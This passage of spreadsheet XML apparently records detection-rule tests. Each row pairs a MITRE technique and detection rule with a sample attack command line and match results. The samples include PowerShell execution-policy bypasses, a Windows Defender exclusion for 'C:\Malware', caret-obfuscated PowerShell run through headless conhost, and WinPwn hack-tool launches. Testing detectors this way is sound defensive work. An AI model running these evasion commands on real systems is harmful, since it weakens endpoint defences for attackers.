      </c>
      <c r="B3414" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3414" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3414" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3414" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F3414" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3414" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3414" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3414" s="43" t="n"/>
      <c r="J3414" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3414" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3415" ht="15.75" customHeight="1" s="42">
      <c r="A3415" s="44" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B3415" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3415" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3415" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3415" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F3415" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3415" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3415" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3415" s="43" t="n"/>
      <c r="J3415" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3415" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3416" ht="15.75" customHeight="1" s="42">
      <c r="A3416" s="44" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B3416" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3416" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3416" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3416" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3416" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3416" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3416" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3416" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3416" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3416" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3417" ht="15.75" customHeight="1" s="42">
      <c r="A3417" s="44" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B3417" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3417" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3417" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3417" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3417" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3417" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3417" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3417" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3417" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3417" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3418" ht="15.75" customHeight="1" s="42">
      <c r="A3418" s="44" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B3418" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3418" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3418" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3418" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3418" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3418" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3418" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3418" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3418" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3418" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3419" ht="15.75" customHeight="1" s="42">
      <c r="A3419" s="44" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B3419" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3419" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3419" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3419" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3419" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3419" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3419" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3419" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3419" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3419" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3420" ht="15.75" customHeight="1" s="42">
      <c r="A3420" s="44" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B3420" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3420" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3420" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3420" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3420" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3420" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3420" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3420" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3420" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3420" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3421" ht="15.75" customHeight="1" s="42">
      <c r="A3421" s="44" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B3421" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3421" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3421" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3421" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F3421" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3421" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3421" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3421" s="44" t="n"/>
      <c r="J3421" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3421" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3422" ht="15.75" customHeight="1" s="42">
      <c r="A3422" s="44" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B3422" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3422" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3422" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3422" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F3422" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3422" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3422" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3422" s="44" t="n"/>
      <c r="J3422" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3422" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3423" ht="15.75" customHeight="1" s="42">
      <c r="A3423" s="44" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B3423" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3423" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3423" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3423" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3423" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3423" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3423" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3423" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3423" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3423" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3424" ht="15.75" customHeight="1" s="42">
      <c r="A3424" s="44" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B3424" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3424" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3424" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3424" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3424" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3424" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3424" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3424" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3424" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3424" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3425" ht="15.75" customHeight="1" s="42">
      <c r="A3425" s="44" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B3425" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3425" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3425" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3425" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3425" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3425" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3425" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3425" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3425" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3425" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3426" ht="15.75" customHeight="1" s="42">
      <c r="A3426" s="44" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B3426" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3426" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3426" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3426" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3426" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3426" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3426" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3426" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3426" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3426" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3427" ht="15.75" customHeight="1" s="42">
      <c r="A3427" s="44" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B3427" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3427" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3427" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3427" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3427" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3427" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3427" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3427" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3427" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3427" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3428" ht="15.75" customHeight="1" s="42">
      <c r="A3428" s="44" t="inlineStr">
        <is>
          <t>t1562</t>
        </is>
      </c>
      <c r="B3428" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C3428" s="44" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D3428" s="44" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E3428" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F3428" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3428" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3428" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3428" s="43" t="n"/>
      <c r="J3428" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3428" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3429" ht="15.75" customHeight="1" s="42">
      <c r="A3429" s="44" t="inlineStr">
        <is>
          <t>t1562</t>
        </is>
      </c>
      <c r="B3429" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C3429" s="44" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D3429" s="44" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E3429" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmANd "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F3429" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3429" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3429" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3429" s="44" t="n"/>
      <c r="J3429" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3429" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3430" ht="15.75" customHeight="1" s="42">
      <c r="A3430" s="44" t="inlineStr">
        <is>
          <t>t1562</t>
        </is>
      </c>
      <c r="B3430" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_namespace_defender</t>
        </is>
      </c>
      <c r="C3430" s="44" t="inlineStr">
        <is>
          <t>Potential Windows Defender Tampering Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D3430" s="44" t="inlineStr">
        <is>
          <t>51cbac1e-eee3-4a90-b1b7-358efb81fa0a</t>
        </is>
      </c>
      <c r="E3430" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-CimMethod -Namespace 'root\Microsoft\Windows\Defender' -ClassName MSFT_MpPreference -MethodName Add -Arguments @{ExclusionPath='C:\Malware'}"</t>
        </is>
      </c>
      <c r="F3430" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3430" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3430" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3430" s="44" t="n"/>
      <c r="J3430" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3430" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3431" ht="15.75" customHeight="1" s="42">
      <c r="A3431" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3431" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C3431" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D3431" s="44" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E3431" s="44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F3431" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3431" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3431" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3431" s="4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431" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3431" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3432" ht="15.75" customHeight="1" s="42">
      <c r="A3432" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3432" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C3432" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D3432" s="44" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E3432" s="44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F3432" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3432" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3432" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3432" s="44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432" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3432" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3433" ht="15.75" customHeight="1" s="42">
      <c r="A3433" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3433" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C3433" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D3433" s="44" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E3433" s="44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F3433" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3433" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3433" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3433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433" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3433" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3434" ht="15.75" customHeight="1" s="42">
      <c r="A3434" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3434" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3434" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3434" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3434" s="44" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" "C:\Windows\System32\WindowsPowerShell\v1.0\pwsh.exe -Command Write-Host 'Bypassed'"</t>
        </is>
      </c>
      <c r="F3434" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3434" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3434" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3434" s="43" t="n"/>
      <c r="J3434" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3434" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3435" ht="15.75" customHeight="1" s="42">
      <c r="A3435" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3435" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3435" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3435" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3435" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --headless "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F3435" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3435" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3435" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3435" s="43" t="n"/>
      <c r="J3435" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3435" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3436" ht="15.75" customHeight="1" s="42">
      <c r="A3436" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3436" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3436" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3436" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3436" s="43" t="inlineStr">
        <is>
          <t>conhost.exe --heADLEss "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F3436" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3436" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3436" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3436" s="43" t="n"/>
      <c r="J3436" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3436" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3437" ht="15.75" customHeight="1" s="42">
      <c r="A3437" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3437" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3437" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3437" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3437" s="43" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F3437" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3437" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3437" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3437" s="43" t="n"/>
      <c r="J3437" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3437" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3438" ht="15.75" customHeight="1" s="42">
      <c r="A3438" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3438" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3438" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3438" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3438" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --hEadLESs "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F3438" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3438" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3438" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3438" s="43" t="n"/>
      <c r="J3438" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3438" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3439" ht="15.75" customHeight="1" s="42">
      <c r="A3439" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3439" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3439" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3439" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E3439" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --hEadLeSs "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F3439" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3439" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3439" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3439" s="43" t="n"/>
      <c r="J3439" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3439" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3440" ht="15.75" customHeight="1" s="42">
      <c r="A3440" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B3440" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C3440" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D3440" s="44" t="inlineStr">
        <is>
